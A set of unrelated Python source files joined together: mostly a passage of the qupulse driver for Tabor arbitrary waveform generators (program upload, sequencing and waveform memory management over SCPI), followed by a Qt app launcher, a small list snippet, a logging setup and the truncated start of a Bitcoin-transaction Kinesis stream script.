self._parent().device[SCPI].send_cmd(command_string)
@with_select
def disable(self):
"""Disables the output of a certain channel"""
command_string = ":OUTP OFF".format(ch_id=self._parent().idn)
self._parent().device[SCPI].send_cmd(command_string)
def _select(self) -> None:
self._parent()._select()
# Implementation
class TaborChannel(AWGChannel):
def __init__(self, idn: int, device: TaborDevice):
super().__init__(idn)
self._device = weakref.ref(device)
self._amplitude_offset_handling = AmplitudeOffsetHandling.IGNORE_OFFSET
# adding Features
self.add_feature(TaborVoltageRange(self))
self.add_feature(TaborActivatableChannels(self))
@property
def device(self) -> TaborDevice:
"""Returns the device that the channel belongs to"""
return self._device()
@property
def channel_tuple(self) -> "TaborChannelTuple":
"""Returns the channel tuple that this channel belongs to"""
return self._channel_tuple()
def _set_channel_tuple(self, channel_tuple: "TaborChannelTuple") -> None:
"""
The channel tuple "channel_tuple" is assigned to this channel
Args:
channel_tuple (TaborChannelTuple): the channel tuple that this channel belongs to
"""
self._channel_tuple = weakref.ref(channel_tuple)
def _select(self) -> None:
self.device[SCPI].send_cmd(":INST:SEL {channel}".format(channel=self.idn))
########################################################################################################################
# ChannelTuple
########################################################################################################################
# Features
class TaborProgramManagement(ProgramManagement):
def __init__(self, channel_tuple: "TaborChannelTuple"):
super().__init__(channel_tuple)
self._programs = {}
self._armed_program = None
self._idle_sequence_table = [(1, 1, 0), (1, 1, 0), (1, 1, 0)]
self._trigger_source = 'BUS'
def get_repetition_mode(self, program_name: str) -> str:
"""
Returns the default repetition mode of a certain program
Args:
program_name (str): name of the program whose repetition mode should be returned
"""
return self._channel_tuple._known_programs[program_name].program._repetition_mode
def set_repetition_mode(self, program_name: str, repetition_mode: str) -> None:
"""
Changes the default repetition mode of a certain program
Args:
program_name (str): name of the program whose repetition mode should be changed
Throws:
ValueError: this Exception is thrown when an invalid repetition mode is given
"""
if repetition_mode in ("infinite", "once"):
self._channel_tuple._known_programs[program_name].program._repetition_mode = repetition_mode
else:
raise ValueError("{} is no vaild repetition mode".format(repetition_mode))
@property
def supported_repetition_modes(self) -> Set[RepetitionMode]:
return {RepetitionMode.INFINITE}
@with_configuration_guard
@with_select
def upload(self, name: str,
program: Loop,
channels: Tuple[Optional[ChannelID], Optional[ChannelID]],
marker_channels: Tuple[Optional[ChannelID], Optional[ChannelID]],
voltage_transformation: Tuple[Callable, Callable],
repetition_mode: str = None,
force: bool = False) -> None:
"""
Upload a program to the AWG.
The policy is to prefer amending the unknown waveforms to overwriting old ones.
"""
if repetition_mode is None:
repetition_mode = self._default_repetition_mode
else:
repetition_mode = RepetitionMode(repetition_mode)
if repetition_mode not in self.supported_repetition_modes:
raise ValueError(f"{repetition_mode} is not supported on {self._channel_tuple}")
if len(channels) != len(self._channel_tuple.channels):
raise ValueError("Wrong number of channels")
if len(marker_channels) != len(self._channel_tuple.marker_channels):
raise ValueError("Wrong number of marker")
if len(voltage_transformation) != len(self._channel_tuple.channels):
raise ValueError("Wrong number of voltage transformations")
# adjust program to fit criteria
sample_rate = self._channel_tuple.device.channel_tuples[0].sample_rate
make_compatible(program,
minimal_waveform_length=192,
waveform_quantum=16,
sample_rate=sample_rate / 10 ** 9)
if name in self._channel_tuple._known_programs:
if force:
self._channel_tuple.free_program(name)
else:
raise ValueError('{} is already known on {}'.format(name, self._channel_tuple.idn))
        # the manual calls the peak-to-peak voltage range "amplitude"
        ranges = tuple(ch[VoltageRange].amplitude for ch in self._channel_tuple.channels)
        voltage_amplitudes = tuple(rng / 2 for rng in ranges)
voltage_offsets = []
for channel in self._channel_tuple.channels:
if channel._amplitude_offset_handling == AmplitudeOffsetHandling.IGNORE_OFFSET:
voltage_offsets.append(0)
elif channel._amplitude_offset_handling == AmplitudeOffsetHandling.CONSIDER_OFFSET:
voltage_offsets.append(channel[VoltageRange].offset)
else:
raise NotImplementedError(
'{} is invalid as AWGAmplitudeOffsetHandling'.format(channel._amplitude_offset_handling))
voltage_offsets = tuple(voltage_offsets)
# parse to tabor program
tabor_program = TaborProgram(program,
channels=tuple(channels),
markers=marker_channels,
device_properties=self._channel_tuple.device.dev_properties,
sample_rate=sample_rate / 10 ** 9,
amplitudes=voltage_amplitudes,
offsets=voltage_offsets,
voltage_transformations=voltage_transformation)
segments, segment_lengths = tabor_program.get_sampled_segments()
waveform_to_segment, to_amend, to_insert = self._channel_tuple._find_place_for_segments_in_memory(segments,
segment_lengths)
self._channel_tuple._segment_references[waveform_to_segment[waveform_to_segment >= 0]] += 1
        for wf_index in np.flatnonzero(to_insert >= 0):
            # non-negative entries mark free slots the corresponding waveform fits into
            segment_index = to_insert[wf_index]
            self._channel_tuple._upload_segment(segment_index, segments[wf_index])
            waveform_to_segment[wf_index] = segment_index
if np.any(to_amend):
segments_to_amend = [segments[idx] for idx in np.flatnonzero(to_amend)]
waveform_to_segment[to_amend] = self._channel_tuple._amend_segments(segments_to_amend)
self._channel_tuple._known_programs[name] = TaborProgramMemory(waveform_to_segment=waveform_to_segment,
program=tabor_program)
        # set the default repetition mode for the program
self.set_repetition_mode(program_name=name, repetition_mode=repetition_mode)
def remove(self, name: str) -> None:
"""
Remove a program from the AWG.
Also discards all waveforms referenced only by the program identified by name.
Args:
name (str): The name of the program to remove.
"""
self._channel_tuple.free_program(name)
self._channel_tuple.cleanup()
def clear(self) -> None:
"""
Removes all programs and waveforms from the AWG.
Caution: This affects all programs and waveforms on the AWG, not only those uploaded using qupulse!
"""
self._channel_tuple.device.channels[0]._select()
self._channel_tuple.device[SCPI].send_cmd(":TRAC:DEL:ALL")
self._channel_tuple.device[SCPI].send_cmd(":SOUR:SEQ:DEL:ALL")
self._channel_tuple.device[SCPI].send_cmd(":ASEQ:DEL")
self._channel_tuple.device[SCPI].send_cmd(":TRAC:DEF 1, 192")
self._channel_tuple.device[SCPI].send_cmd(":TRAC:SEL 1")
self._channel_tuple.device[SCPI].send_cmd(":TRAC:MODE COMB")
self._channel_tuple.device._send_binary_data(bin_dat=self._channel_tuple._idle_segment.get_as_binary())
self._channel_tuple._segment_lengths = 192 * np.ones(1, dtype=np.uint32)
self._channel_tuple._segment_capacity = 192 * np.ones(1, dtype=np.uint32)
self._channel_tuple._segment_hashes = np.ones(1, dtype=np.int64) * hash(self._channel_tuple._idle_segment)
self._channel_tuple._segment_references = np.ones(1, dtype=np.uint32)
self._channel_tuple._advanced_sequence_table = []
self._channel_tuple._sequencer_tables = []
self._channel_tuple._known_programs = dict()
self._change_armed_program(None)
@with_select
def arm(self, name: Optional[str]) -> None:
"""
Load the program 'name' and arm the device for running it.
Args:
name (str): the program the device should change to
"""
if self._channel_tuple._current_program == name:
self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL 1")
else:
self._change_armed_program(name)
@property
def programs(self) -> Set[str]:
"""The set of program names that can currently be executed on the hardware AWG."""
        return set(self._channel_tuple._known_programs.keys())
@with_select
def run_current_program(self) -> None:
"""
This method starts running the active program
Throws:
RuntimeError: This exception is thrown if there is no active program for this device
"""
        if self._channel_tuple.device._is_coupled():
            # this channel tuple is the first channel tuple
            if self._channel_tuple.device._channel_tuples[0] == self._channel_tuple:
if self._channel_tuple._current_program:
repetition_mode = self._channel_tuple._known_programs[
self._channel_tuple._current_program].program._repetition_mode
if repetition_mode == "infinite":
self._cont_repetition_mode()
self._channel_tuple.device[SCPI].send_cmd(':TRIG',
paranoia_level=self._channel_tuple.internal_paranoia_level)
else:
raise ValueError("{} is no vaild repetition mode".format(repetition_mode))
else:
raise RuntimeError("No program active")
else:
                warnings.warn(
                    "TaborWarning - run_current_program() - the device is coupled - run the program via the first channel tuple")
else:
if self._channel_tuple._current_program:
repetition_mode = self._channel_tuple._known_programs[
self._channel_tuple._current_program].program._repetition_mode
if repetition_mode == "infinite":
self._cont_repetition_mode()
self._channel_tuple.device[SCPI].send_cmd(':TRIG', paranoia_level=self._channel_tuple.internal_paranoia_level)
else:
raise ValueError("{} is no vaild repetition mode".format(repetition_mode))
else:
raise RuntimeError("No program active")
@with_select
@with_configuration_guard
def _change_armed_program(self, name: Optional[str]) -> None:
"""The armed program of the channel tuple is changed to the program with the name 'name'"""
if name is None:
sequencer_tables = [self._idle_sequence_table]
advanced_sequencer_table = [(1, 1, 0)]
else:
waveform_to_segment_index, program = self._channel_tuple._known_programs[name]
waveform_to_segment_number = waveform_to_segment_index + 1
# translate waveform number to actual segment
sequencer_tables = [[(rep_count, waveform_to_segment_number[wf_index], jump_flag)
for ((rep_count, wf_index, jump_flag), _) in sequencer_table]
for sequencer_table in program.get_sequencer_tables()]
# insert idle sequence
sequencer_tables = [self._idle_sequence_table] + sequencer_tables
# adjust advanced sequence table entries by idle sequence table offset
advanced_sequencer_table = [(rep_count, seq_no + 1, jump_flag)
for rep_count, seq_no, jump_flag in program.get_advanced_sequencer_table()]
if program.waveform_mode == TaborSequencing.SINGLE:
assert len(advanced_sequencer_table) == 1
assert len(sequencer_tables) == 2
while len(sequencer_tables[1]) < self._channel_tuple.device.dev_properties["min_seq_len"]:
assert advanced_sequencer_table[0][0] == 1
sequencer_tables[1].append((1, 1, 0))
# insert idle sequence in advanced sequence table
advanced_sequencer_table = [(1, 1, 0)] + advanced_sequencer_table
while len(advanced_sequencer_table) < self._channel_tuple.device.dev_properties["min_aseq_len"]:
advanced_sequencer_table.append((1, 1, 0))
self._channel_tuple.device[SCPI].send_cmd("SEQ:DEL:ALL", paranoia_level=self._channel_tuple.internal_paranoia_level)
self._channel_tuple._sequencer_tables = []
self._channel_tuple.device[SCPI].send_cmd("ASEQ:DEL", paranoia_level=self._channel_tuple.internal_paranoia_level)
self._channel_tuple._advanced_sequence_table = []
# download all sequence tables
for i, sequencer_table in enumerate(sequencer_tables):
self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL {}".format(i + 1),
paranoia_level=self._channel_tuple.internal_paranoia_level)
self._channel_tuple.device._download_sequencer_table(sequencer_table)
self._channel_tuple._sequencer_tables = sequencer_tables
self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL 1", paranoia_level=self._channel_tuple.internal_paranoia_level)
self._channel_tuple.device._download_adv_seq_table(advanced_sequencer_table)
self._channel_tuple._advanced_sequence_table = advanced_sequencer_table
self._channel_tuple._current_program = name
def _select(self):
self._channel_tuple.channels[0]._select()
@property
def _configuration_guard_count(self):
return self._channel_tuple._configuration_guard_count
@_configuration_guard_count.setter
def _configuration_guard_count(self, configuration_guard_count):
self._channel_tuple._configuration_guard_count = configuration_guard_count
def _enter_config_mode(self):
self._channel_tuple._enter_config_mode()
def _exit_config_mode(self):
self._channel_tuple._exit_config_mode()
@with_select
def _cont_repetition_mode(self):
"""Changes the run mode of this channel tuple to continous mode"""
self._channel_tuple.device[SCPI].send_cmd(f":TRIG:SOUR:ADV EXT")
self._channel_tuple.device[SCPI].send_cmd(
f":INIT:GATE OFF; :INIT:CONT ON; :INIT:CONT:ENAB ARM; :INIT:CONT:ENAB:SOUR {self._trigger_source}")
class TaborVolatileParameters(VolatileParameters):
def __init__(self, channel_tuple: "TaborChannelTuple", ):
super().__init__(channel_tuple=channel_tuple)
def set_volatile_parameters(self, program_name: str, parameters: Mapping[str, numbers.Number]) -> None:
""" Set the values of parameters which were marked as volatile on program creation. Sets volatile parameters
in program memory and device's (adv.) sequence tables if program is current program.
If set_volatile_parameters needs to run faster, set CONFIG_MODE_PARANOIA_LEVEL to 0 which causes the device to
enter the configuration mode with paranoia level 0 (Note: paranoia level 0 does not work for the simulator)
and set device._is_coupled.
Args:
program_name: Name of program which should be changed.
parameters: Names of volatile parameters and respective values to which they should be set.
"""
waveform_to_segment_index, program = self._channel_tuple._known_programs[program_name]
modifications = program.update_volatile_parameters(parameters)
self._channel_tuple.logger.debug("parameter modifications: %r" % modifications)
if not modifications:
self._channel_tuple.logger.info(
"There are no volatile parameters to update. Either there are no volatile parameters with "
"these names,\nthe respective repetition counts already have the given values or the "
"volatile parameters were dropped during upload.")
return
if program_name == self._channel_tuple._current_program:
commands = []
for position, entry in modifications.items():
if not entry.repetition_count > 0:
raise ValueError("Repetition must be > 0")
if isinstance(position, int):
commands.append(":ASEQ:DEF {},{},{},{}".format(position + 1, entry.element_number + 1,
entry.repetition_count, entry.jump_flag))
else:
table_num, step_num = position
commands.append(":SEQ:SEL {}".format(table_num + 2))
commands.append(":SEQ:DEF {},{},{},{}".format(step_num,
waveform_to_segment_index[entry.element_id] + 1,
entry.repetition_count, entry.jump_flag))
self._channel_tuple._execute_multiple_commands_with_config_guard(commands)
# Wait until AWG is finished
_ = self._channel_tuple.device.main_instrument._visa_inst.query("*OPC?")
class TaborReadProgram(ReadProgram):
def __init__(self, channel_tuple: "TaborChannelTuple", ):
super().__init__(channel_tuple=channel_tuple)
def read_complete_program(self):
return PlottableProgram.from_read_data(self._channel_tuple.read_waveforms(),
self._channel_tuple.read_sequence_tables(),
self._channel_tuple.read_advanced_sequencer_table())
# Implementation
class TaborChannelTuple(AWGChannelTuple):
CONFIG_MODE_PARANOIA_LEVEL = None
def __init__(self, idn: int, device: TaborDevice, channels: Iterable["TaborChannel"],
marker_channels: Iterable["TaborMarkerChannel"]):
super().__init__(idn)
self._device = weakref.ref(device)
self._configuration_guard_count = 0
self._is_in_config_mode = False
self._channels = tuple(channels)
self._marker_channels = tuple(marker_channels)
# the channel and channel marker are assigned to this channel tuple
for channel in self.channels:
channel._set_channel_tuple(self)
for marker_ch in self.marker_channels:
marker_ch._set_channel_tuple(self)
# adding Features
self.add_feature(TaborProgramManagement(self))
self.add_feature(TaborVolatileParameters(self))
self._idle_segment = TaborSegment.from_sampled(voltage_to_uint16(voltage=np.zeros(192),
output_amplitude=0.5,
output_offset=0., resolution=14),
voltage_to_uint16(voltage=np.zeros(192),
output_amplitude=0.5,
output_offset=0., resolution=14),
None, None)
self._known_programs = dict() # type: Dict[str, TaborProgramMemory]
self._current_program = None
self._segment_lengths = None
self._segment_capacity = None
self._segment_hashes = None
self._segment_references = None
self._sequencer_tables = None
self._advanced_sequence_table = None
self._internal_paranoia_level = 0
self[TaborProgramManagement].clear()
        self._channel_tuple_adapter: Optional[ChannelTupleAdapter] = None
@property
def internal_paranoia_level(self) -> Optional[int]:
return self._internal_paranoia_level
@property
def logger(self):
return logging.getLogger("qupulse.tabor")
@property
def channel_tuple_adapter(self) -> ChannelTupleAdapter:
if self._channel_tuple_adapter is None:
self._channel_tuple_adapter = ChannelTupleAdapter(self)
return self._channel_tuple_adapter
def _select(self) -> None:
"""The channel tuple is selected, which means that the first channel of the channel tuple is selected"""
self.channels[0]._select()
@property
def device(self) -> TaborDevice:
"""Returns the device that the channel tuple belongs to"""
return self._device()
@property
def channels(self) -> Collection["TaborChannel"]:
"""Returns all channels of the channel tuple"""
return self._channels
@property
def marker_channels(self) -> Collection["TaborMarkerChannel"]:
"""Returns all marker channels of the channel tuple"""
return self._marker_channels
@property
@with_select
def sample_rate(self) -> TimeType:
"""Returns the sample rate that the channels of a channel tuple have"""
        return TimeType.from_float(float(self.device[SCPI].send_query(":FREQ:RAST?")))
@property
def total_capacity(self) -> int:
return int(self.device.dev_properties["max_arb_mem"]) // 2
def free_program(self, name: str) -> TaborProgramMemory:
if name is None:
raise TaborException("Removing 'None' program is forbidden.")
program = self._known_programs.pop(name)
self._segment_references[program.waveform_to_segment] -= 1
if self._current_program == name:
self[TaborProgramManagement]._change_armed_program(None)
return program
@property
def _segment_reserved(self) -> np.ndarray:
return self._segment_references > 0
@property
def _free_points_in_total(self) -> int:
return self.total_capacity - np.sum(self._segment_capacity[self._segment_reserved])
@property
def _free_points_at_end(self) -> int:
reserved_index = np.flatnonzero(self._segment_reserved)
if len(reserved_index):
return self.total_capacity - np.sum(self._segment_capacity[:reserved_index[-1]])
else:
return self.total_capacity
@with_select
def read_waveforms(self) -> List[np.ndarray]:
device = self.device._get_readable_device(simulator=True)
old_segment = device.send_query(":TRAC:SEL?")
waveforms = []
uploaded_waveform_indices = np.flatnonzero(
self._segment_references) + 1
for segment in uploaded_waveform_indices:
device.send_cmd(":TRAC:SEL {}".format(segment), paranoia_level=self.internal_paranoia_level)
waveforms.append(device.read_segment_data())
device.send_cmd(":TRAC:SEL {}".format(old_segment), paranoia_level=self.internal_paranoia_level)
return waveforms
@with_select
def read_sequence_tables(self) -> List[Tuple[np.ndarray, np.ndarray, np.ndarray]]:
device = self.device._get_readable_device(simulator=True)
old_sequence = device.send_query(":SEQ:SEL?")
sequences = []
uploaded_sequence_indices = np.arange(len(self._sequencer_tables)) + 1
for sequence in uploaded_sequence_indices:
device.send_cmd(":SEQ:SEL {}".format(sequence), paranoia_level=self.internal_paranoia_level)
table = device.read_sequencer_table()
sequences.append((table['repeats'], table['segment_no'], table['jump_flag']))
device.send_cmd(":SEQ:SEL {}".format(old_sequence), paranoia_level=self.internal_paranoia_level)
return sequences
@with_select
def read_advanced_sequencer_table(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
table = self.device._get_readable_device(simulator=True).read_advanced_sequencer_table()
return table['repeats'], table['segment_no'], table['jump_flag']
def read_complete_program(self) -> PlottableProgram:
return PlottableProgram.from_read_data(self.read_waveforms(),
self.read_sequence_tables(),
self.read_advanced_sequencer_table())
def _find_place_for_segments_in_memory(self, segments: Sequence, segment_lengths: np.ndarray) -> \
Tuple[np.ndarray, np.ndarray, np.ndarray]:
        """
        Finds a place in device memory for each segment:
        1. Find known segments
        2. Find empty spaces with fitting length
        3. Find empty spaces with bigger length
        4. Amend remaining segments
        Args:
            segments (Sequence): segments to place
            segment_lengths (np.ndarray): length of each segment
        Returns:
            A tuple (waveform_to_segment, to_amend, to_insert): for each waveform its segment index
            (-1 if not yet in memory), a boolean mask of waveforms that have to be amended, and the
            slot index each waveform is inserted into (-1 if it is not inserted into a free slot).
        """
segment_hashes = np.fromiter((hash(segment) for segment in segments), count=len(segments), dtype=np.int64)
waveform_to_segment = find_positions(self._segment_hashes, segment_hashes)
# separate into known and unknown
unknown = (waveform_to_segment == -1)
known = ~unknown
known_pos_in_memory = waveform_to_segment[known]
assert len(known_pos_in_memory) == 0 or np.all(
self._segment_hashes[known_pos_in_memory] == segment_hashes[known])
new_reference_counter = self._segment_references.copy()
new_reference_counter[known_pos_in_memory] += 1
to_upload_size = np.sum(segment_lengths[unknown] + 16)
free_points_in_total = self.total_capacity - np.sum(self._segment_capacity[self._segment_references > 0])
if free_points_in_total < to_upload_size:
raise MemoryError("Not enough free memory",
free_points_in_total,
to_upload_size,
self._free_points_in_total)
to_amend = cast(np.ndarray, unknown)
to_insert = np.full(len(segments), fill_value=-1, dtype=np.int64)
reserved_indices = np.flatnonzero(new_reference_counter > 0)
first_free = reserved_indices[-1] + 1 if len(reserved_indices) else 0
free_segments = new_reference_counter[:first_free] == 0
free_segment_count = np.sum(free_segments)
# look for a free segment place with the same length
for segment_idx in np.flatnonzero(to_amend):
if free_segment_count == 0:
break
pos_of_same_length = np.logical_and(free_segments,
segment_lengths[segment_idx] == self._segment_capacity[:first_free])
idx_same_length = np.argmax(pos_of_same_length)
if pos_of_same_length[idx_same_length]:
free_segments[idx_same_length] = False
free_segment_count -= 1
to_amend[segment_idx] = False
to_insert[segment_idx] = idx_same_length
# try to find places that are larger than the segments to fit in starting with the large segments and large
# free spaces
segment_indices = np.flatnonzero(to_amend)[np.argsort(segment_lengths[to_amend])[::-1]]
capacities = self._segment_capacity[:first_free]
for segment_idx in segment_indices:
free_capacities = capacities[free_segments]
free_segments_indices = np.flatnonzero(free_segments)[np.argsort(free_capacities)[::-1]]
if len(free_segments_indices) == 0:
break
fitting_segment = np.argmax((free_capacities >= segment_lengths[segment_idx])[::-1])
fitting_segment = free_segments_indices[fitting_segment]
if self._segment_capacity[fitting_segment] >= segment_lengths[segment_idx]:
free_segments[fitting_segment] = False
to_amend[segment_idx] = False
to_insert[segment_idx] = fitting_segment
free_points_at_end = self.total_capacity - np.sum(self._segment_capacity[:first_free])
if np.sum(segment_lengths[to_amend] + 16) > free_points_at_end:
raise MemoryError("Fragmentation does not allow upload.",
np.sum(segment_lengths[to_amend] + 16),
free_points_at_end,
self._free_points_at_end)
return waveform_to_segment, to_amend, to_insert
@with_select
@with_configuration_guard
def _upload_segment(self, segment_index: int, segment: TaborSegment) -> None:
if self._segment_references[segment_index] > 0:
raise ValueError("Reference count not zero")
if segment.num_points > self._segment_capacity[segment_index]:
raise ValueError("Cannot upload segment here.")
segment_no = segment_index + 1
self.device[TaborSCPI].send_cmd(":TRAC:DEF {}, {}".format(segment_no, segment.num_points),
paranoia_level=self.internal_paranoia_level)
self._segment_lengths[segment_index] = segment.num_points
self.device[TaborSCPI].send_cmd(":TRAC:SEL {}".format(segment_no),
paranoia_level=self.internal_paranoia_level)
self.device[TaborSCPI].send_cmd(":TRAC:MODE COMB",
paranoia_level=self.internal_paranoia_level)
wf_data = segment.get_as_binary()
self.device._send_binary_data(bin_dat=wf_data)
self._segment_references[segment_index] = 1
self._segment_hashes[segment_index] = hash(segment)
@with_select
@with_configuration_guard
def _amend_segments(self, segments: List[TaborSegment]) -> np.ndarray:
new_lengths = np.asarray([s.num_points for s in segments], dtype=np.uint32)
wf_data = make_combined_wave(segments)
trac_len = len(wf_data) // 2
segment_index = len(self._segment_capacity)
first_segment_number = segment_index + 1
self.device[TaborSCPI].send_cmd(":TRAC:DEF {},{}".format(first_segment_number, trac_len),
paranoia_level=self.internal_paranoia_level)
self.device[TaborSCPI].send_cmd(":TRAC:SEL {}".format(first_segment_number),
paranoia_level=self.internal_paranoia_level)
self.device[TaborSCPI].send_cmd(":TRAC:MODE COMB",
paranoia_level=self.internal_paranoia_level)
self.device._send_binary_data(bin_dat=wf_data)
old_to_update = np.count_nonzero(self._segment_capacity != self._segment_lengths)
segment_capacity = np.concatenate((self._segment_capacity, new_lengths))
segment_lengths = np.concatenate((self._segment_lengths, new_lengths))
segment_references = np.concatenate((self._segment_references, np.ones(len(segments), dtype=int)))
segment_hashes = np.concatenate((self._segment_hashes, [hash(s) for s in segments]))
if len(segments) < old_to_update:
for i, segment in enumerate(segments):
current_segment_number = first_segment_number + i
self.device[TaborSCPI].send_cmd(":TRAC:DEF {},{}".format(current_segment_number, segment.num_points),
paranoia_level=self.internal_paranoia_level)
else:
# flush the capacity
self.device._download_segment_lengths(segment_capacity)
# update non fitting lengths
for i in np.flatnonzero(segment_capacity != segment_lengths):
self.device[SCPI].send_cmd(":TRAC:DEF {},{}".format(i + 1, segment_lengths[i]))
self._segment_capacity = segment_capacity
self._segment_lengths = segment_lengths
self._segment_hashes = segment_hashes
self._segment_references = segment_references
return segment_index + np.arange(len(segments), dtype=np.int64)
@with_select
@with_configuration_guard
def cleanup(self) -> None:
"""Discard all segments after the last which is still referenced"""
reserved_indices = np.flatnonzero(self._segment_references > 0)
old_end = len(self._segment_lengths)
new_end = reserved_indices[-1] + 1 if len(reserved_indices) else 0
self._segment_lengths = self._segment_lengths[:new_end]
self._segment_capacity = self._segment_capacity[:new_end]
self._segment_hashes = self._segment_hashes[:new_end]
self._segment_references = self._segment_references[:new_end]
try:
# send max 10 commands at once
chunk_size = 10
for chunk_start in range(new_end, old_end, chunk_size):
self.device[SCPI].send_cmd("; ".join("TRAC:DEL {}".format(i + 1)
for i in range(chunk_start, min(chunk_start + chunk_size, old_end))))
except Exception as e:
raise TaborUndefinedState("Error during cleanup. Device is in undefined state.", device=self) from e
@with_configuration_guard
def _execute_multiple_commands_with_config_guard(self, commands: List[str]) -> None:
""" Joins the given commands into one and executes it with configuration guard.
Args:
commands: Commands that should be executed.
"""
cmd_str = ";".join(commands)
self.device[TaborSCPI].send_cmd(cmd_str, paranoia_level=self.internal_paranoia_level)
def _enter_config_mode(self) -> None:
"""
Enter the configuration mode if not already in. All outputs are set to the DC offset of the device and the
sequencing is disabled. The manual states this speeds up sequence validation when uploading multiple sequences.
When entering and leaving the configuration mode the AWG outputs a small (~60 mV in 4 V mode) blip.
"""
if self._is_in_config_mode is False:
            # 1. Select channel pair
            # 2. Select DC as function shape
            # 3. Select built-in waveform mode
if self.device._is_coupled():
out_cmd = ":OUTP:ALL OFF"
else:
out_cmd = ""
for channel in self.channels:
out_cmd = out_cmd + ":INST:SEL {ch_id}; :OUTP OFF;".format(ch_id=channel.idn)
marker_0_cmd = ":SOUR:MARK:SEL 1;:SOUR:MARK:SOUR USER;:SOUR:MARK:STAT OFF"
marker_1_cmd = ":SOUR:MARK:SEL 2;:SOUR:MARK:SOUR USER;:SOUR:MARK:STAT OFF"
wf_mode_cmd = ":SOUR:FUNC:MODE FIX"
cmd = ";".join([marker_0_cmd, marker_1_cmd, wf_mode_cmd])
cmd = out_cmd + cmd
self.device[TaborSCPI].send_cmd(cmd, paranoia_level=self.CONFIG_MODE_PARANOIA_LEVEL)
self._is_in_config_mode = True
@with_select
def _exit_config_mode(self) -> None:
"""Leave the configuration mode. Enter advanced sequence mode and turn on all outputs"""
if self.device._is_coupled():
# Coupled -> switch all channels at once
other_channel_tuple: TaborChannelTuple
if self.channels == self.device.channel_tuples[0].channels:
other_channel_tuple = self.device.channel_tuples[1]
else:
other_channel_tuple = self.device.channel_tuples[0]
if not other_channel_tuple._is_in_config_mode:
self.device[SCPI].send_cmd(":SOUR:FUNC:MODE ASEQ")
self.device[SCPI].send_cmd(":SEQ:SEL 1")
self.device[SCPI].send_cmd(":OUTP:ALL ON")
else:
self.device[SCPI].send_cmd(":SOUR:FUNC:MODE ASEQ")
self.device[SCPI].send_cmd(":SEQ:SEL 1")
for channel in self.channels:
channel[ActivatableChannels].enable()
for marker_ch in self.marker_channels:
marker_ch[ActivatableChannels].enable()
self._is_in_config_mode = False
########################################################################################################################
# Marker Channel
########################################################################################################################
# Features
class TaborActivatableMarkerChannels(ActivatableChannels):
def __init__(self, marker_channel: "TaborMarkerChannel"):
super().__init__()
self._parent = weakref.ref(marker_channel)
@property
def enabled(self) -> bool:
"""
        Returns the state the marker channel is currently in: True means
        activated, False means deactivated.
"""
return self._parent().device[SCPI].send_query(":MARK:STAT ?") == "ON"
@with_select
def enable(self):
"""Enables the output of a certain marker channel"""
command_string = "SOUR:MARK:SOUR USER; :SOUR:MARK:STAT ON"
command_string = command_string.format(
channel=self._parent().channel_tuple.channels[0].idn,
marker=self._parent().channel_tuple.marker_channels.index(self._parent()) + 1)
self._parent().device[SCPI].send_cmd(command_string)
@with_select
def disable(self):
"""Disable the output of a certain marker channel"""
command_string = ":SOUR:MARK:SOUR USER; :SOUR:MARK:STAT OFF"
command_string = command_string.format(
channel=self._parent().channel_tuple.channels[0].idn,
marker=self._parent().channel_tuple.marker_channels.index(self._parent()) + 1)
self._parent().device[SCPI].send_cmd(command_string)
def _select(self) -> None:
self._parent()._select()
# Implementation
class TaborMarkerChannel(AWGMarkerChannel):
def __init__(self, idn: int, device: TaborDevice):
super().__init__(idn)
self._device = weakref.ref(device)
# adding Features
self.add_feature(TaborActivatableMarkerChannels(self))
@property
def device(self) -> TaborDevice:
"""Returns the device that this marker channel belongs to"""
return self._device()
@property
def channel_tuple(self) -> TaborChannelTuple:
"""Returns the channel tuple that this marker channel belongs to"""
return self._channel_tuple()
def _set_channel_tuple(self, channel_tuple: TaborChannelTuple) -> None:
"""
The channel tuple 'channel_tuple' is assigned to this marker channel
Args:
channel_tuple (TaborChannelTuple): the channel tuple that this marker channel belongs to
"""
self._channel_tuple = weakref.ref(channel_tuple)
def _select(self) -> None:
"""
This marker channel is selected and is now the active channel marker of the device
"""
self.device.channels[int((self.idn - 1) / 2)]._select()
self.device[SCPI].send_cmd(":SOUR:MARK:SEL {marker}".format(marker=(((self.idn - 1) % 2) + 1)))
class TaborUndefinedState(TaborException):
"""
    If this exception is raised, the attached Tabor device is in an undefined state.
    It is highly recommended to reset it.
"""
def __init__(self, *args, device: Union[TaborDevice, TaborChannelTuple]):
super().__init__(*args)
self.device = device
def reset_device(self):
if isinstance(self.device, TaborDevice):
self.device[TaborDeviceControl].reset()
elif isinstance(self.device, TaborChannelTuple):
self.device.cleanup()
self.device[TaborProgramManagement].clear()
|
from plustutocenter.controller.concretecontroller import ConcreteController
from plustutocenter.qt.view_qt import ViewQt
controller = ConcreteController()
controller.setView(ViewQt(controller))
controller.startApp()
|
ls = []
for i in range(10_000_000):
ls.append(i)
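# Equivalent one-liner (same result, typically faster):
#     ls = list(range(10_000_000))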
|
import pkg_resources
try:
__version__ = pkg_resources.get_distribution(__name__).version
except pkg_resources.DistributionNotFound:
__version__ = 'unknown'
import logging
logging.addLevelName(5, "TRACE")
logging.TRACE = 5
logging.Logger.trace = lambda self, msg, *args, **kwargs: \
self.log(logging.TRACE, msg, *args, **kwargs)
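# Usage sketch (hypothetical logger name), relying on the TRACE level registered above:
#
#     logging.basicConfig(level=logging.TRACE)
#     logging.getLogger("demo").trace("visible only when the effective level is <= 5")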
|
from __future__ import absolute_import
import argparse
from datetime import datetime
import logging
import Queue
import sys
import time
import threading
import uuid
import boto3
import msgpack
import strongfellowbtc.constants as constants
import strongfellowbtc.hex
from strongfellowbtc.protocol import ds256
import strongfellowbtc.zmq
from strongfellowbtc.logging import configure_logging
def k(region):
return boto3.client('kinesis', region_name=region)
def _stream_name(region, env):
return 'transactions-{region}-{env}'.format(region=region, env=env)
def little_endian_long(n):
bs = bytearray(8)
i = 0
while n != 0:
bs[i] = n & 0xff
n = (n >> 8)
i += 1
return bytes(bs)
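# Worked examples (traced by hand through the loop above):
#   little_endian_long(1)   == b'\x01\x00\x00\x00\x00\x00\x00\x00'
#   little_endian_long(258) == b'\x02\x01\x00\x00\x00\x00\x00\x00'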
def create_stream(args=None):
configure_logging()
if args is None:
args = sys.argv[1:]
parser = argparse.ArgumentParser()
parser.add_argument('--region', required=True)
parser.add_argument('--env', required=True)
parser.add_argument('--host', required=True)
parser.add_argument('--shard-count', default='1', type=int)
